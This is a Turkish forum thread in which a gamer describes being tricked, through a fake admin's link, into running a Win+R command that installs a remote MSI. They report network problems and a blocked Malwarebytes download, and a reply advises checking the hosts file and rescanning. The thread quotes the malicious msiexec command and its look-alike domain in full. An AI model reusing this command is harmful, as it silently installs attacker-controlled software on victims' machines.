umitben

Üyecik
Merhaba, Metin2 için bir DLL dosyası indirmem gerekiyordu ve admin olduğunu söyleyen birinden gelen bağlantıyı güvenilir sandım.

Yönlendirdiği sitede şu komutu Win+R menüsüne girmemi istedi:
msiexec /qn /i https://clloudverify.com/i.msi

Bu komutu girdikten sonra internet bağlantımda bazı sorunlar ortaya çıkmaya başladı. ExitLag programı artık Discord için düzgün çalışmamaya başladı. Kablosuz cihazlarda çok yüksek pingler oluştu. Valorant'a girerken "internete bağlanamadınız, bağlantıyı kontrol edip tekrar deneyin" gibi uyarılar almaya başladım.

Bu sorunlardan önce sistemimde herhangi bir problem yoktu. Tüm bu sıkıntılar yukarıdaki kodu girdikten sonra başladı.

Bazı arkadaşlarım Windows geri yükleme yapmamı önerdi ancak sistemimde C ve D disklerinin koruması kapalı olduğundan geri yükleme noktası oluşturulmamış.

Malwarebytes indirmeye çalıştığımda ise sitenin indirme sayfasında "403 Not Found" hatası alıyorum.

Üç farklı cihazdan tam güvenlik taraması yaptım, fakat hiçbir tehdit tespit edilmedi.

X (eski adıyla Twitter) üzerinde gönderilere bakarken "something went wrong" hatası alıyor ve görseller yüklenmiyor gibi başka problemler de yaşıyorum.

İnternet sağlayıcım Superonline’ı arayıp kontrol ettirdim, altyapı kaynaklı herhangi bir sorun, güncelleme aksaması ya da teknik arıza bulunmadığını söylediler. Fast.com ve Speedtest testlerinde de hızım normal görünüyor.

Bu lanetten nasıl kurtulabilirim, yardımcı olursanız çok sevinirim.

Son düzenleyen: Moderatör:
@Recep Baltaş hocam bunu paylaşmıştı X üzerinde. Bu bir virüs. Geçmiş olsun. Host dosyanızı kontrol edin, Malwarebytes sitesi engellenmiş olabilir o dosyada. Genelde bunu onları indirmeyin ki virüs silinmesin diye yaparlar. Dosyayı kontrol edin, host dosyanızı normale çevirin. Malwarebytes ile tarama yapın. Gerekirse Kaspersky ile de bir tarama yapın. Bir şey bulamazsa da format yoluna başvurun...